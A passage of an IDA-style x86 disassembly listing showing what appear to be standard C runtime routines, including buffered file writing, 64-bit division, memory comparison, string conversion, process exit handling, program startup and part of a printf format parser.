loc_4196E8: ; CODE XREF: sub_41944F+2B�j
; sub_41944F+134�j ...
xor eax, eax
loc_4196EA: ; CODE XREF: sub_41944F+16�j
; sub_41944F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41944F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196EF proc near ; CODE XREF: sub_40C8B4+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_419713
xor eax, eax
jmp loc_4197E0
; ---------------------------------------------------------------------------
loc_419713: ; CODE XREF: sub_4196EF+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_419726
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41972D
; ---------------------------------------------------------------------------
loc_419726: ; CODE XREF: sub_4196EF+2D�j
mov [ebp+arg_C], 1000h
loc_41972D: ; CODE XREF: sub_4196EF+35�j
; sub_4196EF+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_419761
mov eax, [esi+4]
test eax, eax
jz short loc_419761
cmp ebx, eax
mov edi, ebx
jb short loc_419747
mov edi, eax
loc_419747: ; CODE XREF: sub_4196EF+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_417390
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_4197A7
; ---------------------------------------------------------------------------
loc_419761: ; CODE XREF: sub_4196EF+47�j
; sub_4196EF+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_4197AC
test ecx, ecx
jz short loc_419775
push esi
call sub_41A7D0
test eax, eax
pop ecx
jnz short loc_4197EE
loc_419775: ; CODE XREF: sub_4196EF+79�j
cmp [ebp+arg_C], 0
jz short loc_419788
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_41978A
; ---------------------------------------------------------------------------
loc_419788: ; CODE XREF: sub_4196EF+8A�j
mov edi, ebx
loc_41978A: ; CODE XREF: sub_4196EF+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41ED97
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4197E5
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_4197E5
loc_4197A7: ; CODE XREF: sub_4196EF+70�j
mov edi, [ebp+var_4]
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197AC: ; CODE XREF: sub_4196EF+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_419D23
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4197EE
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_4197D5
mov [ebp+arg_C], 1
loc_4197D5: ; CODE XREF: sub_4196EF+BB�j
; sub_4196EF+DD�j
test ebx, ebx
jnz loc_41972D
mov eax, [ebp+arg_8]
loc_4197E0: ; CODE XREF: sub_4196EF+1F�j
; sub_4196EF+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4197E5: ; CODE XREF: sub_4196EF+AD�j
; sub_4196EF+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_4197F0
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_4196EF+84�j
; sub_4196EF+CF�j
mov eax, edi
loc_4197F0: ; CODE XREF: sub_4196EF+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_4197E0
sub_4196EF endp
; =============== S U B R O U T I N E =======================================
sub_4197F9 proc near ; CODE XREF: sub_40D000+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:off_4240A8
cmp eax, 0FFFFFFFFh
jnz short loc_419819
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
call sub_41EF44
pop ecx
loc_419815: ; CODE XREF: sub_4197F9+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419819: ; CODE XREF: sub_4197F9+D�j
test al, 1
jz short loc_41983A
test [esp+arg_4], 2
jz short loc_41983A
mov ds:dword_48A014, 0Dh
mov ds:dword_48A018, 5
jmp short loc_419815
; ---------------------------------------------------------------------------
loc_41983A: ; CODE XREF: sub_4197F9+22�j
; sub_4197F9+29�j
xor eax, eax
retn
sub_4197F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419840 proc near ; CODE XREF: sub_40D12A+5F�p
; sub_40D12A+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_419861
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_419861: ; CODE XREF: sub_419840+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41987D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41987D: ; CODE XREF: sub_419840+27�j
or eax, eax
jnz short loc_419899
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4198DA
; ---------------------------------------------------------------------------
loc_419899: ; CODE XREF: sub_419840+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4198A7: ; CODE XREF: sub_419840+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4198A7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4198D5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4198D5
jb short loc_4198D6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4198D6
loc_4198D5: ; CODE XREF: sub_419840+85�j
; sub_419840+8B�j
dec esi
loc_4198D6: ; CODE XREF: sub_419840+8D�j
; sub_419840+93�j
xor edx, edx
mov eax, esi
loc_4198DA: ; CODE XREF: sub_419840+57�j
dec edi
jnz short loc_4198E4
neg edx
neg eax
sbb edx, 0
loc_4198E4: ; CODE XREF: sub_419840+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_419840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4198F0 proc near ; CODE XREF: sub_40D48D+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41993C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41993D
test eax, 1
jz short loc_41991D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41996A
inc esi
inc edi
dec eax
jz short loc_41993A
loc_41991D: ; CODE XREF: sub_4198F0+20�j
; sub_4198F0+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41996A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41996A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41991D
loc_41993A: ; CODE XREF: sub_4198F0+2B�j
; sub_4198F0+84�j
pop edi
pop esi
locret_41993C: ; CODE XREF: sub_4198F0+6�j
retn
; ---------------------------------------------------------------------------
loc_41993D: ; CODE XREF: sub_4198F0+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_419972
repe cmpsd
jz short loc_419972
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_419965
cmp ch, dh
jnz short loc_419965
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_419965
cmp ch, dh
loc_419965: ; CODE XREF: sub_4198F0+63�j
; sub_4198F0+67�j ...
mov eax, 0
loc_41996A: ; CODE XREF: sub_4198F0+26�j
; sub_4198F0+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_419972: ; CODE XREF: sub_4198F0+55�j
; sub_4198F0+59�j
test eax, eax
jz short loc_41993A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_419965
dec eax
jz short loc_419999
cmp dh, ch
jnz short loc_419965
dec eax
jz short loc_419999
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_419965
dec eax
loc_419999: ; CODE XREF: sub_4198F0+8F�j
; sub_4198F0+96�j
pop edi
pop esi
retn
sub_4198F0 endp
; =============== S U B R O U T I N E =======================================
sub_41999C proc near ; CODE XREF: sub_40E5EB+55�p
; sub_415F86+236�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_4199B3
loc_4199A9: ; CODE XREF: sub_41999C+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_4199A9
loc_4199B3: ; CODE XREF: sub_41999C+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_41999C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199B9 proc near ; CODE XREF: sub_40E5EB+19�p
; sub_40E5EB+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_419A86
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_419AB3
cmp ds:dword_48A0A8, esi
jnz short loc_419A0A
cmp edi, esi
jbe loc_419AB3
loc_4199E9: ; CODE XREF: sub_4199B9+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_419AB3
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_4199E9
jmp loc_419AB3
; ---------------------------------------------------------------------------
loc_419A0A: ; CODE XREF: sub_4199B9+26�j
mov ebx, [ebp+arg_4]
mov esi, ds:dword_424070
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push ds:dword_48A0B8
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_419AB2
call ds:dword_42408C ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_419A44
loc_419A35: ; CODE XREF: sub_4199B9+CB�j
; sub_4199B9+F7�j
mov ds:dword_48A014, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_419AB3
; ---------------------------------------------------------------------------
loc_419A44: ; CODE XREF: sub_4199B9+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_419A4C: ; CODE XREF: sub_4199B9+B3�j
mov cl, [eax]
test cl, cl
jz short loc_419A6E
mov edx, ds:off_4395A0
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_419A63
inc eax
loc_419A63: ; CODE XREF: sub_4199B9+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_419A4C
loc_419A6E: ; CODE XREF: sub_4199B9+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push ds:dword_48A0B8
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_419AB3
jmp short loc_419A35
; ---------------------------------------------------------------------------
loc_419A86: ; CODE XREF: sub_4199B9+F�j
cmp ds:dword_48A0A8, esi
jnz short loc_419A99
push [ebp+arg_4]
call sub_417AB0
pop ecx
jmp short loc_419AB3
; ---------------------------------------------------------------------------
loc_419A99: ; CODE XREF: sub_4199B9+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_48A0B8
call ds:dword_424070 ; MultiByteToWideChar
cmp eax, esi
jz short loc_419A35
loc_419AB2: ; CODE XREF: sub_4199B9+6B�j
dec eax
loc_419AB3: ; CODE XREF: sub_4199B9+1A�j
; sub_4199B9+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4199B9 endp
; =============== S U B R O U T I N E =======================================
sub_419AB8 proc near ; CODE XREF: _0:00419C77�p
mov eax, ds:off_43956C
test eax, eax
jz short loc_419AC3
call eax ; sub_417D73
loc_419AC3: ; CODE XREF: sub_419AB8+7�j
push offset dword_426028
push offset dword_426014
call sub_419BA0
push offset dword_426010
push offset dword_426000
call sub_419BA0
add esp, 10h
retn
sub_419AB8 endp
; =============== S U B R O U T I N E =======================================
sub_419AE5 proc near ; CODE XREF: _0:00419CB6�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_419B07
add esp, 0Ch
retn
sub_419AE5 endp
; =============== S U B R O U T I N E =======================================
sub_419AF6 proc near ; CODE XREF: _0:00419CD5�p
; sub_419CDA+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_419B07
add esp, 0Ch
retn
sub_419AF6 endp
; =============== S U B R O U T I N E =======================================
sub_419B07 proc near ; CODE XREF: sub_419AE5+8�p
; sub_419AF6+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_48A05C, edi
jnz short loc_419B24
push [esp+4+arg_0]
call ds:dword_42413C ; GetCurrentProcess
push eax
call ds:dword_424170 ; TerminateProcess
loc_419B24: ; CODE XREF: sub_419B07+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_48A058, edi
mov ds:byte_48A054, bl
jnz short loc_419B78
mov eax, ds:dword_48B69C
test eax, eax
jz short loc_419B67
mov ecx, ds:dword_48B698
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_419B66
loc_419B53: ; CODE XREF: sub_419B07+5D�j
mov eax, [esi]
test eax, eax
jz short loc_419B5B
call eax
loc_419B5B: ; CODE XREF: sub_419B07+50�j
sub esi, 4
cmp esi, ds:dword_48B69C
jnb short loc_419B53
loc_419B66: ; CODE XREF: sub_419B07+4A�j
pop esi
loc_419B67: ; CODE XREF: sub_419B07+3C�j
push offset dword_426034
push offset dword_42602C
call sub_419BA0
pop ecx
pop ecx
loc_419B78: ; CODE XREF: sub_419B07+33�j
push offset dword_426040
push offset dword_426038
call sub_419BA0
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_419B9E
push [esp+4+arg_0]
mov ds:dword_48A05C, edi
call ds:off_42414C
loc_419B9E: ; CODE XREF: sub_419B07+85�j
pop edi
retn
sub_419B07 endp
; =============== S U B R O U T I N E =======================================
sub_419BA0 proc near ; CODE XREF: sub_419AB8+15�p
; sub_419AB8+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_419BA5: ; CODE XREF: sub_419BA0+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_419BB8
mov eax, [esi]
test eax, eax
jz short loc_419BB3
call eax
loc_419BB3: ; CODE XREF: sub_419BA0+F�j
add esi, 4
jmp short loc_419BA5
; ---------------------------------------------------------------------------
loc_419BB8: ; CODE XREF: sub_419BA0+9�j
pop esi
retn
sub_419BA0 endp
; =============== S U B R O U T I N E =======================================
sub_419BBA proc near ; CODE XREF: sub_40EE72+2BBB�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_424158 ; DeleteFileA
test eax, eax
jnz short loc_419BD0
call ds:dword_42408C ; RtlGetLastWin32Error
jmp short loc_419BD2
; ---------------------------------------------------------------------------
loc_419BD0: ; CODE XREF: sub_419BBA+C�j
xor eax, eax
loc_419BD2: ; CODE XREF: sub_419BBA+14�j
test eax, eax
jz short loc_419BE1
push eax
call sub_41EF44
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_419BE1: ; CODE XREF: sub_419BBA+1A�j
xor eax, eax
retn
sub_419BBA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4246B0
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_4241A0 ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_48A02C, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_48A028, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_48A024, ecx
shr eax, 10h
mov ds:dword_48A020, eax
xor esi, esi
push esi
call sub_41ACE4
pop ecx
test eax, eax
jnz short loc_419C50
push 1Ch
call sub_419CFF
pop ecx
loc_419C50: ; CODE XREF: _0:00419C46�j
mov [ebp-4], esi
call sub_41F5BF
call ds:dword_42419C ; GetCommandLineA
mov ds:dword_48B68C, eax
call sub_41F48D
mov ds:dword_48A060, eax
call sub_41F240
call sub_41F187
call sub_419AB8
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call ds:dword_424198 ; GetStartupInfoA
call sub_41F12F
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_419C9D
movzx eax, word ptr [ebp-2Ch]
jmp short loc_419CA0
; ---------------------------------------------------------------------------
loc_419C9D: ; CODE XREF: _0:00419C95�j
push 0Ah
pop eax
loc_419CA0: ; CODE XREF: _0:00419C9B�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call ds:off_424100
push eax
call sub_40E6A9
mov [ebp-60h], eax
push eax
call sub_419AE5
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_41EFAB
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_419AF6
; =============== S U B R O U T I N E =======================================
sub_419CDA proc near ; CODE XREF: sub_418682+16�p
; sub_41F187+4E�p ...
arg_0 = dword ptr 4
cmp ds:dword_48A068, 1
jnz short loc_419CE8
call sub_41F84C
loc_419CE8: ; CODE XREF: sub_419CDA+7�j
push [esp+arg_0]
call sub_41F885
push 0FFh
call ds:off_439590
pop ecx
pop ecx
retn
sub_419CDA endp
; =============== S U B R O U T I N E =======================================
sub_419CFF proc near ; CODE XREF: _0:00419C4A�p
arg_0 = dword ptr 4
cmp ds:dword_48A068, 1
jnz short loc_419D0D
call sub_41F84C
loc_419D0D: ; CODE XREF: sub_419CFF+7�j
push [esp+arg_0]
call sub_41F885
pop ecx
push 0FFh
call ds:off_42414C
retn
sub_419CFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D23 proc near ; CODE XREF: sub_4172AE+46�p
; sub_41782A+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_419E2C
test al, 40h
jnz loc_419E2C
test al, 1
jz short loc_419D5B
and dword ptr [esi+4], 0
test al, 10h
jz loc_419E2C
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_419D5B: ; CODE XREF: sub_419D23+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_419D95
cmp esi, offset dword_43BCD8
jz short loc_419D83
cmp esi, offset dword_43BCF8
jnz short loc_419D8E
loc_419D83: ; CODE XREF: sub_419D23+56�j
push ebx
call sub_41FA1C
test eax, eax
pop ecx
jnz short loc_419D95
loc_419D8E: ; CODE XREF: sub_419D23+5E�j
push esi
call sub_41F9D8
pop ecx
loc_419D95: ; CODE XREF: sub_419D23+4E�j
; sub_419D23+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_419E02
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_419DC5
push edi
push eax
push ebx
call sub_41ED97
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_419DF8
; ---------------------------------------------------------------------------
loc_419DC5: ; CODE XREF: sub_419D23+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_419DE0
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_48B340[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_419DE5
; ---------------------------------------------------------------------------
loc_419DE0: ; CODE XREF: sub_419D23+A5�j
mov eax, offset dword_43BC20
loc_419DE5: ; CODE XREF: sub_419D23+BB�j
test byte ptr [eax+4], 20h
jz short loc_419DF8
push 2
push 0
push ebx
call sub_41E517
add esp, 0Ch
loc_419DF8: ; CODE XREF: sub_419D23+A0�j
; sub_419D23+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_419E16
; ---------------------------------------------------------------------------
loc_419E02: ; CODE XREF: sub_419D23+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41ED97
add esp, 0Ch
mov [ebp+arg_4], eax
loc_419E16: ; CODE XREF: sub_419D23+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_419E22
or dword ptr [esi+0Ch], 20h
jmp short loc_419E31
; ---------------------------------------------------------------------------
loc_419E22: ; CODE XREF: sub_419D23+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_419E34
; ---------------------------------------------------------------------------
loc_419E2C: ; CODE XREF: sub_419D23+10�j
; sub_419D23+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_419E31: ; CODE XREF: sub_419D23+FD�j
or eax, 0FFFFFFFFh
loc_419E34: ; CODE XREF: sub_419D23+107�j
pop esi
pop ebx
pop ebp
retn
sub_419D23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E38 proc near ; CODE XREF: sub_4172AE+29�p
; sub_41782A+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_41A551
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_419E6C
; ---------------------------------------------------------------------------
loc_419E64: ; CODE XREF: sub_419E38+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_419E6C: ; CODE XREF: sub_419E38+2A�j
cmp [ebp+var_14], edx
jl loc_41A551
cmp bl, 20h
jl short loc_419E8D
cmp bl, 78h
jg short loc_419E8D
movsx eax, bl
mov al, [eax+42469Ch]
and eax, 0Fh
jmp short loc_419E8F
; ---------------------------------------------------------------------------
loc_419E8D: ; CODE XREF: sub_419E38+40�j
; sub_419E38+45�j
xor eax, eax
loc_419E8F: ; CODE XREF: sub_419E38+53�j
movsx eax, ds:byte_4246BC[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_41A540 ; default
jmp off_41A559[eax*4] ; switch jump
loc_419EAD: ; DATA XREF: _0:off_41A559�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00419EA6 case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EC8: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
movsx eax, bl ; jumptable 00419EA6 case 2
sub eax, 20h
jz short loc_419F0B
sub eax, 3
jz short loc_419F02
sub eax, 8
jz short loc_419EF9
dec eax
dec eax
jz short loc_419EF0
sub eax, 3
jnz loc_41A540 ; default
or [ebp+var_4], 8
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EF0: ; CODE XREF: sub_419E38+A4�j
or [ebp+var_4], 4
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419EF9: ; CODE XREF: sub_419E38+A0�j
or [ebp+var_4], 1
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F02: ; CODE XREF: sub_419E38+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F0B: ; CODE XREF: sub_419E38+96�j
or [ebp+var_4], 2
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F14: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 2Ah ; jumptable 00419EA6 case 3
jnz short loc_419F3C
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_41A540 ; default
or [ebp+var_4], 4
neg eax
loc_419F34: ; CODE XREF: sub_419E38+111�j
mov [ebp+var_20], eax
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F3C: ; CODE XREF: sub_419E38+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_419F34
; ---------------------------------------------------------------------------
loc_419F4B: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
mov [ebp+var_10], edx ; jumptable 00419EA6 case 4
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F53: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 2Ah ; jumptable 00419EA6 case 5
jnz short loc_419F76
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_41A540 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F76: ; CODE XREF: sub_419E38+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F88: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 49h ; jumptable 00419EA6 case 6
jz short loc_419FBB
cmp bl, 68h
jz short loc_419FB2
cmp bl, 6Ch
jz short loc_419FA9
cmp bl, 77h
jnz loc_41A540 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FA9: ; CODE XREF: sub_419E38+15D�j
or [ebp+var_4], 10h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FB2: ; CODE XREF: sub_419E38+158�j
or [ebp+var_4], 20h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FBB: ; CODE XREF: sub_419E38+153�j
cmp byte ptr [edi], 36h
jnz short loc_419FD4
cmp byte ptr [edi+1], 34h
jnz short loc_419FD4
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FD4: ; CODE XREF: sub_419E38+186�j
; sub_419E38+18C�j
mov [ebp+var_30], edx
loc_419FD7: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
mov ecx, ds:off_4395A0 ; jumptable 00419EA6 case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41A003
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41A579
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41A003: ; CODE XREF: sub_419E38+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41A579
add esp, 0Ch
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_41A01B: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
movsx eax, bl ; jumptable 00419EA6 case 7
cmp eax, 67h
jg loc_41A243
cmp eax, 65h
jge loc_41A0C6
cmp eax, 58h
jg loc_41A124
jz loc_41A2B7
sub eax, 43h
jz loc_41A0E7
dec eax
